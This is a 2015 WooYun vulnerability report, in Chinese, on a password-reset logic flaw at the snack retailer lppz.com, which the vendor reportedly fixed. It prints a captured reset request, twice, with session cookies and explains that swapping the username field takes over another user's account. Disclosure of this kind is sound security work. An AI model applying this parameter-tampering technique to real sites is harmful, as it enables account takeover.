当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0115330

漏洞标题:良品铺子任意用户登陆

相关厂商:良品铺子

漏洞作者: 路人甲

提交时间:2015-05-21 17:57

修复时间:2015-05-22 10:50

公开时间:2015-05-22 10:50

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-21: 细节已通知厂商并且等待厂商处理中
2015-05-22: 厂商已经确认,细节仅向厂商公开
2015-05-22: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

跟风前面两弹,不知道会不会重复

详细说明:

http://www.lppz.com/find/password/findPwd.jhtml
找回密码

11.jpg


这里应该是不能改成别人的手机号发送了,修复了
我们输入正确的验证码,下一步,到达第三步

11.jpg


然后输入新密码,此过程抓包

POST /find/password/findPage4.jhtml HTTP/1.1
Host: www.lppz.com
Proxy-Connection: keep-alive
Content-Length: 35
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.lppz.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.5.1000 Chrome/30.0.1599.101 Safari/537.36
token: 97f9a7af-40ac-46cf-9642-a53dcf17ded4
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: http://www.lppz.com/find/password/findPwd_reset.jhtml
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN
Cookie: route=d56e7065d3254c70482a3ded30899656; NTKF_T2D_CLIENTID=guestEF8172EA-37D3-7288-46F3-75189AE2337F; nTalk_CACHE_DATA={uid:kf_9893_ISME9754_guestEF8172EA-37D3-72,tid:1432188655017824}; token=97f9a7af-40ac-46cf-9642-a53dcf17ded4; JSESSIONID=5ECE50215602796D801560BE00EC0F31; LPPZ_SESSION_ID=5ECE50215602796D801560BE00EC0F31; Hm_lvt_7cefb8e3a7c5228e2810c2d7556c4653=1432188653; Hm_lpvt_7cefb8e3a7c5228e2810c2d7556c4653=1432190214
password=test1234&username=test1234


此时修改username为其他用户的username即可重置成功
这里我们用上一个漏洞的doushidb的用户
重置成功,登陆成功

11.jpg

漏洞证明:

http://www.lppz.com/find/password/findPwd.jhtml
找回密码

11.jpg


这里应该是不能改成别人的手机号发送了,修复了
我们输入正确的验证码,下一步,到达第三步

11.jpg


然后输入新密码,此过程抓包

POST /find/password/findPage4.jhtml HTTP/1.1
Host: www.lppz.com
Proxy-Connection: keep-alive
Content-Length: 35
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://www.lppz.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.5.1000 Chrome/30.0.1599.101 Safari/537.36
token: 97f9a7af-40ac-46cf-9642-a53dcf17ded4
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
DNT: 1
Referer: http://www.lppz.com/find/password/findPwd_reset.jhtml
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN
Cookie: route=d56e7065d3254c70482a3ded30899656; NTKF_T2D_CLIENTID=guestEF8172EA-37D3-7288-46F3-75189AE2337F; nTalk_CACHE_DATA={uid:kf_9893_ISME9754_guestEF8172EA-37D3-72,tid:1432188655017824}; token=97f9a7af-40ac-46cf-9642-a53dcf17ded4; JSESSIONID=5ECE50215602796D801560BE00EC0F31; LPPZ_SESSION_ID=5ECE50215602796D801560BE00EC0F31; Hm_lvt_7cefb8e3a7c5228e2810c2d7556c4653=1432188653; Hm_lpvt_7cefb8e3a7c5228e2810c2d7556c4653=1432190214
password=test1234&username=test1234


此时修改username为其他用户的username即可重置成功
这里我们用上一个漏洞的doushidb的用户
重置成功,登陆成功

11.jpg

修复方案:

验证权限啊

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-05-22 09:33

厂商回复:

多谢来搞。。。

最新状态:

2015-05-22:已修复


漏洞评价:

评论

  1. 2015-05-23 10:57 | Blackgame ( 实习白帽子 | Rank:70 漏洞数:13 | dddd)

    多谢来搞!!我去

  2. 2015-06-01 22:11 | 孤风 ( 普通白帽子 | Rank:101 漏洞数:13 | 不骄不躁,做个安静的美男子)

    这让老夫如何是好